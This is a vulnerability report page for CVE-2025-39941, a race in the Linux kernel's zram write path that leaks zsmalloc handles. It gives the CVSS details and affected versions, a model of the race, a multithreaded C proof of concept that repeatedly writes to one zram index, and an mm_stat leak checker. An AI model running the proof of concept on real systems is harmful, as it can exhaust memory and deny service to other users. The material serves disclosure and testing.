Security Vulnerability Report
CVE-2025-39941 CVSS 4.7 MEDIUM

CVE-2025-39941

Published: 2025-10-04 08:15:47
Last Modified: 2026-01-23 20:37:16
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

zram: fix slot write race condition

Parallel concurrent writes to the same zram index result in leaked
zsmalloc handles. Schematically we can have something like this:

CPU0                            CPU1
zram_slot_lock()
zs_free(handle)
zram_slot_lock()
                                zram_slot_lock()
                                zs_free(handle)
                                zram_slot_lock()

compress                        compress
handle = zs_malloc()            handle = zs_malloc()
zram_slot_lock
zram_set_handle(handle)
zram_slot_lock
                                zram_slot_lock
                                zram_set_handle(handle)
                                zram_slot_lock

Either CPU0 or CPU1 zsmalloc handle will leak because zs_free() is done
too early. In fact, we need to reset zram entry right before we set its
new handle, all under the same slot lock scope.
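The ordering problem in the commit message is easier to see when both sequences are driven step by step. The following is an added, user-space model written for this page; it is not kernel code and not part of the report. Handles come from a toy pool that records which ones are live, the slot lock is a flag that aborts on re-entry so each lock scope is explicit, and the interleaving is the one drawn above (CPU0 then CPU1 at each stage). Reading the second zram_slot_lock() in each pair as the end of that lock scope is an assumption of this example.

```c
/*
 * Added example (not kernel code, not part of the report): a single-threaded,
 * step-by-step model of the pre-fix and fixed write orderings. A leaked handle
 * is one the pool still marks live while the slot no longer references it.
 * Assumption: the second zram_slot_lock() in each pair of the diagram is where
 * that lock scope ends.
 */
#include <assert.h>
#include <stdbool.h>
#include <stdio.h>

#define NO_HANDLE   0
#define MAX_HANDLES 16

struct pool_model {
    bool live[MAX_HANDLES];  /* live[h] is true while handle h is allocated */
    int  next;               /* last handle issued; handles are never reused */
};

struct slot_model {
    bool locked;
    int  handle;             /* the zsmalloc handle this index currently owns */
};

static void slot_lock(struct slot_model *s)   { assert(!s->locked); s->locked = true;  }
static void slot_unlock(struct slot_model *s) { assert(s->locked);  s->locked = false; }

static int pool_malloc(struct pool_model *p) {
    int h = ++p->next;                  /* handles start at 1; 0 means "empty" */
    assert(h < MAX_HANDLES);
    p->live[h] = true;
    return h;
}

static void pool_free(struct pool_model *p, int h) {
    if (h != NO_HANDLE) p->live[h] = false;
}

static int pool_live_count(const struct pool_model *p) {
    int n = 0;
    for (int h = 1; h <= p->next; h++) n += p->live[h];
    return n;
}

/* One writer ("CPU") racing on the same slot. */
struct cpu { struct pool_model *pool; struct slot_model *slot; int new_handle; };

/* Pre-fix step 1: free the old handle in its own lock scope. */
static void prefix_free_early(struct cpu *c) {
    slot_lock(c->slot);
    pool_free(c->pool, c->slot->handle);
    c->slot->handle = NO_HANDLE;
    slot_unlock(c->slot);
}

/* Both versions: compress outside the lock and allocate a fresh handle. */
static void compress_and_alloc(struct cpu *c) { c->new_handle = pool_malloc(c->pool); }

/* Pre-fix step 2: set the new handle; whatever the slot holds now is overwritten. */
static void prefix_set_handle(struct cpu *c) {
    slot_lock(c->slot);
    c->slot->handle = c->new_handle;
    slot_unlock(c->slot);
}

/* Fixed step 2: reset the entry right before setting the new handle, same lock scope. */
static void fixed_reset_and_set(struct cpu *c) {
    slot_lock(c->slot);
    pool_free(c->pool, c->slot->handle);   /* frees the other CPU's handle if it won */
    c->slot->handle = c->new_handle;
    slot_unlock(c->slot);
}

/*
 * Drive the interleaving from the report (CPU0 then CPU1 at each stage) and
 * return the number of leaked handles: live handles minus the one the slot
 * legitimately owns at the end.
 */
static int leaked_handles(bool with_fix) {
    struct pool_model pool = {0};
    struct slot_model slot = { false, NO_HANDLE };
    struct cpu cpu0 = { &pool, &slot, NO_HANDLE };
    struct cpu cpu1 = { &pool, &slot, NO_HANDLE };

    slot.handle = pool_malloc(&pool);      /* the index already holds data */

    if (!with_fix) {                       /* zs_free() done too early, by both CPUs */
        prefix_free_early(&cpu0);
        prefix_free_early(&cpu1);
    }
    compress_and_alloc(&cpu0);
    compress_and_alloc(&cpu1);
    if (with_fix) {
        fixed_reset_and_set(&cpu0);
        fixed_reset_and_set(&cpu1);
    } else {
        prefix_set_handle(&cpu0);
        prefix_set_handle(&cpu1);
    }

    return pool_live_count(&pool) - (slot.handle != NO_HANDLE ? 1 : 0);
}

int main(void) {
    printf("pre-fix ordering: %d handle(s) leaked\n", leaked_handles(false));
    printf("fixed ordering:   %d handle(s) leaked\n", leaked_handles(true));
    return 0;
}
```

With the pre-fix ordering, CPU0's freshly allocated handle is overwritten by CPU1's zram_set_handle() and nothing ever frees it; with the fixed ordering, the free happens inside the same lock scope as the set, so whichever CPU loses the race still releases the winner's predecessor. Each lost race pins one compressed object in the zsmalloc pool, which is why the impact is availability only (memory exhaustion), matching the C:N/I:N/A:H vector.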

CVSS Details

CVSS Score
4.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.14, before 6.16.9) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.17:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.17:rc2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.17:rc3:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.17:rc4:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.17:rc5:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.17:rc6:*:*:*:*:*:* - VULNERABLE
Linux kernel 6.14 through 6.16.8 and 6.17-rc1 through 6.17-rc6, on builds with the zram block device enabled (CONFIG_ZRAM); 6.16.9 and the 6.17 release are outside the affected range.
Stable branches: the fix is carried by the two patch commits recorded in the raw JSON data below (ce4be9e4307c and ff750e9f2c4d); check whether your distribution kernel includes one of them rather than relying on the version number alone.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * CVE-2025-39941 - zram slot write race condition PoC
 *
 * This PoC demonstrates the race condition in the zram slot write path
 * that leads to zsmalloc handle leaks. It does not crash the kernel; the
 * effect of a won race is compressed memory that is never freed.
 *
 * Compile: gcc -o poc_zram_race poc_zram_race.c -lpthread
 * Usage:   sudo ./poc_zram_race /dev/zram0
 */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <pthread.h>

#define NUM_THREADS    8
#define NUM_ITERATIONS 10000
#ifndef PAGE_SIZE
#define PAGE_SIZE      4096
#endif
#define TARGET_INDEX   0   /* All threads write to the same zram index */

static int zram_fd;
static volatile int start_flag = 0;

typedef struct {
    int thread_id;
    int iterations;
} thread_arg_t;

void *race_worker(void *arg)
{
    thread_arg_t *targ = (thread_arg_t *)arg;

    /* Page-aligned buffer: required for O_DIRECT and matches the zram page size */
    char *page = aligned_alloc(PAGE_SIZE, PAGE_SIZE);
    if (!page) {
        perror("aligned_alloc");
        return NULL;
    }

    /* Wait for all threads to be ready */
    while (!start_flag)
        sched_yield();

    for (int i = 0; i < targ->iterations; i++) {
        /* Fill page with thread-specific data */
        memset(page, targ->thread_id, PAGE_SIZE);

        /* Write to the same zram index to trigger the race condition;
         * zram index = byte offset / PAGE_SIZE */
        off_t offset = (off_t)TARGET_INDEX * PAGE_SIZE;
        if (pwrite(zram_fd, page, PAGE_SIZE, offset) < 0) {
            perror("pwrite");
            break;
        }
    }

    free(page);
    return NULL;
}

int main(int argc, char *argv[])
{
    if (argc < 2) {
        fprintf(stderr, "Usage: %s <zram_device>\n", argv[0]);
        return 1;
    }

    /* O_DIRECT bypasses the page cache so each pwrite() reaches the zram
     * driver as its own request instead of being merged and written back once */
    zram_fd = open(argv[1], O_RDWR | O_DIRECT);
    if (zram_fd < 0) {
        perror("open zram device");
        return 1;
    }

    pthread_t threads[NUM_THREADS];
    thread_arg_t args[NUM_THREADS];

    /* Create worker threads */
    for (int i = 0; i < NUM_THREADS; i++) {
        args[i].thread_id = i;
        args[i].iterations = NUM_ITERATIONS;
        if (pthread_create(&threads[i], NULL, race_worker, &args[i]) != 0) {
            perror("pthread_create");
            return 1;
        }
    }

    /* Release all threads at once to maximize the chance of overlapping writes */
    usleep(100000);
    start_flag = 1;

    /* Wait for all threads to complete */
    for (int i = 0; i < NUM_THREADS; i++)
        pthread_join(threads[i], NULL);

    printf("Race condition test completed. Leaked handles stay in the zsmalloc pool;\n"
           "compare mem_used_total before and after the run.\n");
    printf("Monitor with: cat /sys/block/zram0/mm_stat\n");

    close(zram_fd);
    return 0;
}
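The PoC points at mm_stat but leaves the reading of it to the operator. The checker below is an added example written for this page, not part of the PoC or the kernel: it parses mm_stat snapshots taken between rounds of the write loop and counts how many rounds grew the zsmalloc pool. The field order comes from the kernel's zram documentation (orig_data_size, compr_data_size, mem_used_total, mem_limit, mem_used_max, same_pages, pages_compacted, huge_pages, huge_pages_since); the leak heuristic, that pool memory for a single rewritten index should stay bounded and steady growth means handles are being pinned, is this example's own assumption. The sample snapshots are constructed, not captured from a real system.

```c
/*
 * Added example (not from the report or the kernel): a checker for
 * /sys/block/zramN/mm_stat snapshots taken between rounds of the same-index
 * write loop. Only the first three fields are parsed:
 *   orig_data_size compr_data_size mem_used_total ...
 * Heuristic (this example's assumption): leaked handles are never returned
 * to the zsmalloc pool, so with one index being rewritten, mem_used_total
 * that keeps growing from round to round is the leak signature.
 */
#include <stdbool.h>
#include <stdio.h>

struct mm_stat {
    unsigned long long orig_data_size;   /* uncompressed bytes stored on the device */
    unsigned long long compr_data_size;  /* compressed bytes stored */
    unsigned long long mem_used_total;   /* bytes currently held by the zsmalloc pool */
};

/* Parse one mm_stat line; false if it lacks the three leading numeric fields. */
static bool parse_mm_stat(const char *line, struct mm_stat *out)
{
    return sscanf(line, "%llu %llu %llu", &out->orig_data_size,
                  &out->compr_data_size, &out->mem_used_total) == 3;
}

/* Read a live snapshot; needs a real zram device and is not used by the tests. */
static bool read_mm_stat(const char *devname, struct mm_stat *out)
{
    char path[128], line[256];
    snprintf(path, sizeof path, "/sys/block/%s/mm_stat", devname);
    FILE *f = fopen(path, "r");
    if (!f)
        return false;
    bool ok = fgets(line, sizeof line, f) != NULL && parse_mm_stat(line, out);
    fclose(f);
    return ok;
}

/*
 * Given n snapshots in round order, count the rounds in which mem_used_total
 * grew. 0 means the pool is stable; close to n-1 means memory is pinned on
 * every round, which is what leaked handles look like. Returns -1 on bad input.
 */
static int growing_rounds(const char *const *lines, int n)
{
    struct mm_stat prev, cur;
    int growing = 0;

    if (n < 2 || !parse_mm_stat(lines[0], &prev))
        return -1;
    for (int i = 1; i < n; i++) {
        if (!parse_mm_stat(lines[i], &cur))
            return -1;
        if (cur.mem_used_total > prev.mem_used_total)
            growing++;
        prev = cur;
    }
    return growing;
}

/* Constructed sample snapshots, not captured from a real system; only the
 * third field is interpreted, the rest is filler in the documented layout. */
static const char *const stable_rounds[] = {
    "4096 46 16384 0 16384 0 0 0 0",
    "4096 46 16384 0 16384 0 0 0 0",
    "4096 46 16384 0 16384 0 0 0 0",
};
static const char *const leaking_rounds[] = {
    "4096 46 16384 0 16384 0 0 0 0",
    "4096 46 81920 0 81920 0 0 0 0",
    "4096 46 229376 0 229376 0 0 0 0",
};

int main(void)
{
    struct mm_stat s;
    printf("stable device:  %d growing round(s)\n", growing_rounds(stable_rounds, 3));
    printf("leaking device: %d growing round(s)\n", growing_rounds(leaking_rounds, 3));
    if (read_mm_stat("zram0", &s))
        printf("live zram0: mem_used_total=%llu bytes\n", s.mem_used_total);
    return 0;
}
```

In practice, run the PoC several times against a device that holds nothing but the one target page, capture mm_stat after each run, and feed those lines to growing_rounds(). zsmalloc packs many small compressed objects into one zspage, so the pool grows in steps rather than on every lost race; a handful of rounds with NUM_ITERATIONS in the tens of thousands is enough for the trend to be visible on a vulnerable kernel, while a patched kernel stays flat.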

References

https://git.kernel.org/stable/c/ce4be9e4307c5a60701ff6e0cafa74caffdc54ce (Patch)
https://git.kernel.org/stable/c/ff750e9f2c4d63854c33967d1646b5e89a9a19a2 (Patch)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-39941", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T08:15:47.103", "lastModified": "2026-01-23T20:37:16.010", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nzram: fix slot write race condition\n\nParallel concurrent writes to the same zram index result in leaked\nzsmalloc handles. Schematically we can have something like this:\n\nCPU0 CPU1\nzram_slot_lock()\nzs_free(handle)\nzram_slot_lock()\n\t\t\t\tzram_slot_lock()\n\t\t\t\tzs_free(handle)\n\t\t\t\tzram_slot_lock()\n\ncompress\t\t\tcompress\nhandle = zs_malloc()\t\thandle = zs_malloc()\nzram_slot_lock\nzram_set_handle(handle)\nzram_slot_lock\n\t\t\t\tzram_slot_lock\n\t\t\t\tzram_set_handle(handle)\n\t\t\t\tzram_slot_lock\n\nEither CPU0 or CPU1 zsmalloc handle will leak because zs_free() is done\ntoo early. In fact, we need to reset zram entry right before we set its\nnew handle, all under the same slot lock scope."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-362"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.14", "versionEndExcluding": "6.16.9", "matchCriteriaId": "EE235AB0-05B1-418B-ADD0-620D5ABC03B9"}, {"vulnerable": true, "criteria": 
"cpe:2.3:o:linux:linux_kernel:6.17:rc1:*:*:*:*:*:*", "matchCriteriaId": "327D22EF-390B-454C-BD31-2ED23C998A1C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc2:*:*:*:*:*:*", "matchCriteriaId": "C730CD9A-D969-4A8E-9522-162AAF7C0EE9"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc3:*:*:*:*:*:*", "matchCriteriaId": "39982C4B-716E-4B2F-8196-FA301F47807D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc4:*:*:*:*:*:*", "matchCriteriaId": "340BEEA9-D70D-4290-B502-FBB1032353B1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc5:*:*:*:*:*:*", "matchCriteriaId": "47E4C5C0-079F-4838-971B-8C503D48FCC2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc6:*:*:*:*:*:*", "matchCriteriaId": "5A4516A6-C12E-42A4-8C0E-68AEF3264504"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/ce4be9e4307c5a60701ff6e0cafa74caffdc54ce", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ff750e9f2c4d63854c33967d1646b5e89a9a19a2", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}